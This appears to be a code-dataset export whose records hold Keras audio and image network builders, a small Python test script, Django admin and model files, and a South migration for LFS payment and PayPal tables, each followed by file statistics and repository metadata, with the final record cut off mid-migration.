y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_4, filt_size_a_4, kernel_initializer='he_normal', name='audio_embedding_layer', padding='same', kernel_regularizer=regularizers.l2(weight_decay))(y_a) m = Model(inputs=x_a, outputs=y_a) return m def _construct_mel256_audio_network(include_frontend=True): """ Returns an uninitialized model object for an audio network with a Mel spectrogram input (with 256 frequency bins). Returns ------- model : tf.keras.Model Model object. """ weight_decay = 1e-5 n_dft = 2048 n_mels = 256 n_hop = 242 asr = 48000 audio_window_dur = 1 if include_frontend: # INPUT input_shape = (1, asr * audio_window_dur) x_a = Input(shape=input_shape, dtype='float32') # MELSPECTROGRAM PREPROCESSING # 256 x 199 x 1 from kapre.composed import get_melspectrogram_layer spec = __fix_kapre_spec(get_melspectrogram_layer)( input_shape=input_shape, n_fft=n_dft, hop_length=n_hop, n_mels=n_mels, sample_rate=asr, return_decibel=True, pad_end=True, input_data_format='channels_first', output_data_format='channels_last') y_a = spec(x_a) else: input_shape = (n_mels, int(np.ceil(asr * audio_window_dur / n_hop)), 1) x_a = y_a = Input(shape=input_shape, dtype='float32') y_a = BatchNormalization()(y_a) # CONV BLOCK 1 n_filter_a_1 = 64 filt_size_a_1 = (3, 3) pool_size_a_1 = (2, 2) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_1, strides=2)(y_a) # CONV BLOCK 2 n_filter_a_2 = 128 filt_size_a_2 = (3, 3) pool_size_a_2 = (2, 2) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_2, strides=2)(y_a) # CONV BLOCK 3 n_filter_a_3 = 256 filt_size_a_3 = (3, 3) pool_size_a_3 = (2, 2) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_3, strides=2)(y_a) # CONV BLOCK 4 n_filter_a_4 = 512 filt_size_a_4 = (3, 3) y_a = Conv2D(n_filter_a_4, filt_size_a_4, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_4, filt_size_a_4, kernel_initializer='he_normal', name='audio_embedding_layer', padding='same', kernel_regularizer=regularizers.l2(weight_decay))(y_a) m = Model(inputs=x_a, outputs=y_a) return m def _construct_image_network(): """ Returns an uninitialized model object for a image network. Returns ------- model : tf.keras.Model Model object. """ weight_decay = 1e-5 im_height = 224 im_width = 224 num_channels = 3 x_i = Input(shape=(im_height, im_width, num_channels), dtype='float32') y_i = BatchNormalization()(x_i) # CONV BLOCK 1 n_filter_i_1 = 64 filt_size_i_1 = (3, 3) pool_size_i_1 = (2, 2) y_i = Conv2D(n_filter_i_1, filt_size_i_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = Conv2D(n_filter_i_1, filt_size_i_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = Activation('relu')(y_i) y_i = BatchNormalization()(y_i) y_i = MaxPooling2D(pool_size=pool_size_i_1, strides=2, padding='same')(y_i) # CONV BLOCK 2 n_filter_i_2 = 128 filt_size_i_2 = (3, 3) pool_size_i_2 = (2, 2) y_i = Conv2D(n_filter_i_2, filt_size_i_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = Conv2D(n_filter_i_2, filt_size_i_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = MaxPooling2D(pool_size=pool_size_i_2, strides=2, padding='same')(y_i) # CONV BLOCK 3 n_filter_i_3 = 256 filt_size_i_3 = (3, 3) pool_size_i_3 = (2, 2) y_i = Conv2D(n_filter_i_3, filt_size_i_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = Conv2D(n_filter_i_3, filt_size_i_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = MaxPooling2D(pool_size=pool_size_i_3, strides=2, padding='same')(y_i) # CONV BLOCK 4 n_filter_i_4 = 512 filt_size_i_4 = (3, 3) pool_size_i_4 = (28, 28) y_i = Conv2D(n_filter_i_4, filt_size_i_4, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = Conv2D(n_filter_i_4, filt_size_i_4, name='vision_embedding_layer', padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) m = Model(inputs=x_i, outputs=y_i) return m AUDIO_MODELS = { 'linear': _construct_linear_audio_network, 'mel128': _construct_mel128_audio_network, 'mel256': _construct_mel256_audio_network }
34.85444
120
0.645521
3,386
23,945
4.231246
0.082103
0.023592
0.01382
0.017589
0.803937
0.782648
0.776645
0.749913
0.728485
0.719271
0
0.037571
0.246356
23,945
686
121
34.905248
0.756345
0.208102
0
0.679901
0
0
0.065092
0.006929
0
0
0
0
0
1
0.037221
false
0
0.032258
0
0.1067
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
bc2d836e72de07e5028a1c83f17bd7847af4f7ff
393
py
Python
python_scripts/test.py
claraqin/CoursePath
715346441e9675fd181ba45aa3ac926e88b0be02
[ "MIT" ]
1
2019-12-18T18:57:52.000Z
2019-12-18T18:57:52.000Z
python_scripts/test.py
claraqin/CoursePath
715346441e9675fd181ba45aa3ac926e88b0be02
[ "MIT" ]
null
null
null
python_scripts/test.py
claraqin/CoursePath
715346441e9675fd181ba45aa3ac926e88b0be02
[ "MIT" ]
null
null
null
#test.py # d = {} # d['And'] = None # print('And' in d) # print(d['And']) # if 'And' in d and d['And']: # print('"And" in d and d["And"] is True') # else: # print('"And" in d and d["And"] is False') # if 'And' in d: # print('"And" in d is True') # else: # print('"And" in d is False') # e = {} # print('And' in e) # e['And'] = None # print('And' in e) # print(e['And']) print(max([]))
17.863636
44
0.503817
73
393
2.712329
0.191781
0.227273
0.353535
0.277778
0.651515
0.414141
0.348485
0.20202
0
0
0
0
0.21883
393
22
45
17.863636
0.644951
0.86514
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0
0
0
1
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
6
70acae2eb5979e25258fc52d04b5fc041e789724
79
py
Python
petisco/base/domain/ids/user_id.py
alice-biometrics/petisco
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
[ "MIT" ]
19
2019-11-01T09:27:17.000Z
2021-12-15T10:52:31.000Z
petisco/base/domain/ids/user_id.py
alice-biometrics/petisco
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
[ "MIT" ]
68
2020-01-15T06:55:00.000Z
2022-02-22T15:57:24.000Z
petisco/base/domain/ids/user_id.py
alice-biometrics/petisco
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
[ "MIT" ]
2
2019-11-19T10:40:25.000Z
2019-11-28T07:12:07.000Z
from petisco.base.domain.model.uuid import Uuid class UserId(Uuid): pass
13.166667
47
0.746835
12
79
4.916667
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.164557
79
5
48
15.8
0.893939
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
70cd6cc9e5a57abd0624213d002a0c5c494489c6
140
py
Python
houses/admin.py
johnopana/Rental_App
a3be4dc8ef6e000af70b4e4561805f240b638298
[ "MIT", "Unlicense" ]
null
null
null
houses/admin.py
johnopana/Rental_App
a3be4dc8ef6e000af70b4e4561805f240b638298
[ "MIT", "Unlicense" ]
7
2020-02-28T12:00:44.000Z
2022-02-10T14:19:19.000Z
houses/admin.py
johnopana/Rental_App
a3be4dc8ef6e000af70b4e4561805f240b638298
[ "MIT", "Unlicense" ]
3
2020-02-27T10:33:53.000Z
2020-09-23T06:42:44.000Z
from django.contrib import admin from .models import * admin.site.register(Profile) admin.site.register(House) admin.site.register(Owner)
17.5
32
0.8
20
140
5.6
0.55
0.241071
0.455357
0
0
0
0
0
0
0
0
0
0.092857
140
7
33
20
0.88189
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.4
0
0.4
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
cb35402138f7ff515300a1ea328ba451fe73bbf7
29
py
Python
thinsos/__init__.py
mullenkamp/ThinSOS
3609f1f3b03390c3ebf33cb30da7a79cae85a890
[ "Apache-2.0" ]
null
null
null
thinsos/__init__.py
mullenkamp/ThinSOS
3609f1f3b03390c3ebf33cb30da7a79cae85a890
[ "Apache-2.0" ]
2
2019-04-24T20:18:13.000Z
2019-04-24T21:01:57.000Z
thinsos/__init__.py
mullenkamp/ThinSOS
3609f1f3b03390c3ebf33cb30da7a79cae85a890
[ "Apache-2.0" ]
null
null
null
from thinsos.core import SOS
14.5
28
0.827586
5
29
4.8
1
0
0
0
0
0
0
0
0
0
0
0
0.137931
29
1
29
29
0.96
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
cb6cde8d9c3e46ef91adc826e28d46a47293bb61
28,719
py
Python
lfs/payment/migrations/0001_initial.py
restless/django-lfs
4058f9d45b416ef2e8c28a87856ea0f1550b523d
[ "BSD-3-Clause" ]
1
2020-02-26T03:07:39.000Z
2020-02-26T03:07:39.000Z
lfs/payment/migrations/0001_initial.py
mxins/django-lfs
bf42ed80ce0e1ec96db6ab985adcc614ea79dfc8
[ "BSD-3-Clause" ]
null
null
null
lfs/payment/migrations/0001_initial.py
mxins/django-lfs
bf42ed80ce0e1ec96db6ab985adcc614ea79dfc8
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): depends_on = ( ("paypal.ipn", '0001_first_migration'), ("order", "0001_initial"), ) def forwards(self, orm): # Adding model 'PaymentMethod' db.create_table('payment_paymentmethod', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('active', self.gf('django.db.models.fields.BooleanField')(default=False)), ('priority', self.gf('django.db.models.fields.IntegerField')(default=0)), ('name', self.gf('django.db.models.fields.CharField')(max_length=50)), ('description', self.gf('django.db.models.fields.TextField')(blank=True)), ('note', self.gf('django.db.models.fields.TextField')(blank=True)), ('image', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True)), ('tax', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['tax.Tax'], null=True, blank=True)), ('price', self.gf('django.db.models.fields.FloatField')(default=0.0)), ('deletable', self.gf('django.db.models.fields.BooleanField')(default=True)), ('module', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)), ('type', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)), )) db.send_create_signal('payment', ['PaymentMethod']) # Adding model 'PaymentMethodPrice' db.create_table('payment_paymentmethodprice', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('payment_method', self.gf('django.db.models.fields.related.ForeignKey')(related_name='prices', to=orm['payment.PaymentMethod'])), ('price', self.gf('django.db.models.fields.FloatField')(default=0.0)), ('priority', self.gf('django.db.models.fields.IntegerField')(default=0)), ('active', self.gf('django.db.models.fields.BooleanField')(default=False)), )) db.send_create_signal('payment', ['PaymentMethodPrice']) # Adding model 'PayPalOrderTransaction' db.create_table('payment_paypalordertransaction', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('order', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['order.Order'], unique=True)), )) db.send_create_signal('payment', ['PayPalOrderTransaction']) # Adding M2M table for field ipn on 'PayPalOrderTransaction' db.create_table('payment_paypalordertransaction_ipn', ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('paypalordertransaction', models.ForeignKey(orm['payment.paypalordertransaction'], null=False)), ('paypalipn', models.ForeignKey(orm['ipn.paypalipn'], null=False)) )) db.create_unique('payment_paypalordertransaction_ipn', ['paypalordertransaction_id', 'paypalipn_id']) def backwards(self, orm): # Deleting model 'PaymentMethod' db.delete_table('payment_paymentmethod') # Deleting model 'PaymentMethodPrice' db.delete_table('payment_paymentmethodprice') # Deleting model 'PayPalOrderTransaction' db.delete_table('payment_paypalordertransaction') # Removing M2M table for field ipn on 'PayPalOrderTransaction' db.delete_table('payment_paypalordertransaction_ipn') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'catalog.deliverytime': { 'Meta': {'ordering': "('min',)", 'object_name': 'DeliveryTime'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'max': ('django.db.models.fields.FloatField', [], {}), 'min': ('django.db.models.fields.FloatField', [], {}), 'unit': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '2'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'ipn.paypalipn': { 'Meta': {'object_name': 'PayPalIPN', 'db_table': "'paypal_ipn'"}, 'address_city': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}), 'address_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'address_country_code': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'address_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'address_state': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}), 'address_status': ('django.db.models.fields.CharField', [], {'max_length': '11', 'blank': 'True'}), 'address_street': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}), 'address_zip': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}), 'amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'amount1': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'amount2': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'amount3': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'amount_per_cycle': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'auction_buyer_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'auction_closing_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'auction_multi_item': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}), 'auth_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'auth_exp': ('django.db.models.fields.CharField', [], {'max_length': '28', 'blank': 'True'}), 'auth_id': ('django.db.models.fields.CharField', [], {'max_length': '19', 'blank': 'True'}), 'auth_status': ('django.db.models.fields.CharField', [], {'max_length': '9', 'blank': 'True'}), 'business': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'case_creation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'case_id': ('django.db.models.fields.CharField', [], {'max_length': '14', 'blank': 'True'}), 'case_type': ('django.db.models.fields.CharField', [], {'max_length': '24', 'blank': 'True'}), 'charset': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'contact_phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}), 'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'currency_code': ('django.db.models.fields.CharField', [], {'default': "'USD'", 'max_length': '32', 'blank': 'True'}), 'custom': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'exchange_rate': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '16', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'flag_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}), 'flag_info': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'for_auction': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'from_view': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}), 'handling_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'initial_payment_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'invoice': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'ipaddress': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'blank': 'True'}), 'item_name': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'item_number': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'mc_amount1': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_amount2': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_amount3': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_currency': ('django.db.models.fields.CharField', [], {'default': "'USD'", 'max_length': '32', 'blank': 'True'}), 'mc_fee': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_gross': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_handling': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_shipping': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'memo': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'next_payment_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'notify_version': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'num_cart_items': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}), 'option_name1': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'option_name2': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'outstanding_balance': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'parent_txn_id': ('django.db.models.fields.CharField', [], {'max_length': '19', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '24', 'blank': 'True'}), 'payer_business_name': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'payer_email': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'payer_id': ('django.db.models.fields.CharField', [], {'max_length': '13', 'blank': 'True'}), 'payer_status': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}), 'payment_cycle': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'payment_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'payment_gross': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'payment_status': ('django.db.models.fields.CharField', [], {'max_length': '9', 'blank': 'True'}), 'payment_type': ('django.db.models.fields.CharField', [], {'max_length': '7', 'blank': 'True'}), 'pending_reason': ('django.db.models.fields.CharField', [], {'max_length': '14', 'blank': 'True'}), 'period1': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'period2': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'period3': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'period_type': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'product_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'product_type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'profile_status': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'protection_eligibility': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'quantity': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}), 'query': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'reason_code': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}), 'reattempt': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}), 'receipt_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'receiver_email': ('django.db.models.fields.EmailField', [], {'max_length': '127', 'blank': 'True'}), 'receiver_id': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'recur_times': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}), 'recurring': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}), 'recurring_payment_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'remaining_settle': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'residence_country': ('django.db.models.fields.CharField', [], {'max_length': '2', 'blank': 'True'}), 'response': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'retry_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'rp_invoice_id': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'settle_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'settle_currency': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'shipping': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'shipping_method': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'subscr_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'subscr_effective': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'subscr_id': ('django.db.models.fields.CharField', [], {'max_length': '19', 'blank': 'True'}), 'tax': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'test_ipn': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'time_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'transaction_entity': ('django.db.models.fields.CharField', [], {'max_length': '7', 'blank': 'True'}), 'transaction_subject': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'txn_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '19', 'blank': 'True'}), 'txn_type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'verify_sign': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}) }, 'order.order': { 'Meta': {'ordering': "('-created',)", 'object_name': 'Order'}, 'account_number': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'bank_identification_code': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'bank_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'customer_email': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'customer_firstname': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'customer_lastname': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'depositor': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'ia_content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'order_invoice_address'", 'to': "orm['contenttypes.ContentType']"}), 'ia_object_id': ('django.db.models.fields.PositiveIntegerField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'message': 